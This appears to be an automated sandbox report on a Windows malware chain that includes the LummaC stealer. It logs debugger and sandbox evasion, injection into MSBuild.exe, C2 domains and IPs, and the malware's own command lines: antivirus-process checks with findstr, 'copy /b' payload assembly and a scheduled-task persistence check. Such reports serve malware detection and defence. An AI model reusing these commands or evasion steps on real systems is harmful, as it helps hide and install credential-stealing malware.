Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: powershell.exe, 00000023.00000002.3067255526.0000023280228000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: svchost.exe, 0000000D.00000003.2871486173.000002877A028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: 1639401074.exe, 0000001C.00000002.2931698311.0000000001419000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2285983526.00000000010F9000.00000040.00000001.01000000.00000006.sdmp, EUONBTH0X1WAZ900JF4PYRKDM.exe, 00000004.00000002.2305126231.0000000000312000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.2342274608.00000000011A2000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000007.00000002.4521279718.00000000011A2000.00000040.00000001.01000000.0000000B.sdmp, 1639401074.exe, 0000001C.00000002.2920443910.00000000002D7000.00000040.00000001.01000000.00000013.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_5-10002
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_5-10040
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_5-10023

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Process queried: DebugPort
Source: C:\Windows\System32\regsvr32.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe

Code function: 4_2_050B0558 rdtsc

4_2_050B0558

Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Code function: 4_2_0015652B mov eax, dword ptr fs:[00000030h]	4_2_0015652B
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Code function: 4_2_0015A302 mov eax, dword ptr fs:[00000030h]	4_2_0015A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00FEA302 mov eax, dword ptr fs:[00000030h]	5_2_00FEA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00FE652B mov eax, dword ptr fs:[00000030h]	5_2_00FE652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FEA302 mov eax, dword ptr fs:[00000030h]	7_2_00FEA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FE652B mov eax, dword ptr fs:[00000030h]	7_2_00FE652B

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\regsvr32.exe	Process token adjusted: Debug
Source: C:\Windows\System32\regsvr32.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Domain query: m.adnxs.com
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 208.95.112.1 80
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 91.212.166.99 4404

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe PID: 6056, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: random[1].exe.7.dr, UserProfile.cs	Reference to suspicious API methods: Program.VirtualProtect(ref Program.inputData[0], Program.inputData.Length, 64u, ref lpflOldProtect)
Source: 34.2.regsvr32.exe.2310000.2.raw.unpack, Messages.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: 34.2.regsvr32.exe.2310000.2.raw.unpack, XLogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe

File written: C:\Users\user\AppData\Local\Temp\wr4cnd4b\wr4cnd4b.0.cs

Jump to dropped file

Compiles code to access protected / encrypted code

Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe

File written: C:\Users\user\AppData\Local\Temp\gaqlxgdr\gaqlxgdr.0.cs

Jump to dropped file

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Memory written: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: 1639401074.exe, 0000001C.00000003.2880337183.0000000005290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: finickypwk.lat
Source: 1639401074.exe, 0000001C.00000003.2880337183.0000000005290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: shoefeatthe.lat
Source: 1639401074.exe, 0000001C.00000003.2880337183.0000000005290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: savorraiykj.lat
Source: 1639401074.exe, 0000001C.00000003.2880337183.0000000005290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: kickykiduz.lat
Source: 1639401074.exe, 0000001C.00000003.2880337183.0000000005290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: miniatureyu.lat
Source: 1639401074.exe, 0000001C.00000003.2880337183.0000000005290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: leggelatez.lat
Source: 1639401074.exe, 0000001C.00000003.2880337183.0000000005290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: washyceehsu.lat
Source: 1639401074.exe, 0000001C.00000003.2880337183.0000000005290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: bloodyswif.lat
Source: 1639401074.exe, 0000001C.00000003.2880337183.0000000005290000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: breakfasutwy.cyou

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42F000
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43A000
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 442000
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 443000
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 444000
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 11C8008

Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe "C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe "C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe "C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe "C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe "C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe "C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Process created: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe "C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 5256 -ip 5256
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 956
Source: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 36469
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Geographic
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "TEAMS" Mw
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 36469\Avoiding.com + Hood + Centered + Collectors + Visual + Additionally + Celebration + Flesh + Ventures + Waters 36469\Avoiding.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Characterized + ..\Entries + ..\Arbitration + ..\Put + ..\Comics + ..\Japanese L
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Avoiding.com L
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Process created: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe "C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe" /VERYSILENT
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: unknown unknown
Source: C:\Windows\System32\regsvr32.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gaqlxgdr\gaqlxgdr.cmdline"
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB10.tmp" "c:\Users\user\AppData\Local\Temp\gaqlxgdr\CSCB36A130CAC24B60A582C1D3CEEF98E.TMP"

Source: Avoiding.com, 0000001A.00000002.4516830676.0000000000E63000.00000002.00000001.01000000.00000012.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2285983526.00000000010F9000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: PVProgram Manager
Source: skotes.exe, skotes.exe, 00000007.00000002.4522447015.00000000011E7000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: Program Manager
Source: 1639401074.exe, 0000001C.00000002.2920443910.00000000002D7000.00000040.00000001.01000000.00000013.sdmp	Binary or memory string: \Program Manager

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 7_2_00FCDD91 cpuid

7_2_00FCDD91

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062147001\db8c172567.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062147001\db8c172567.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
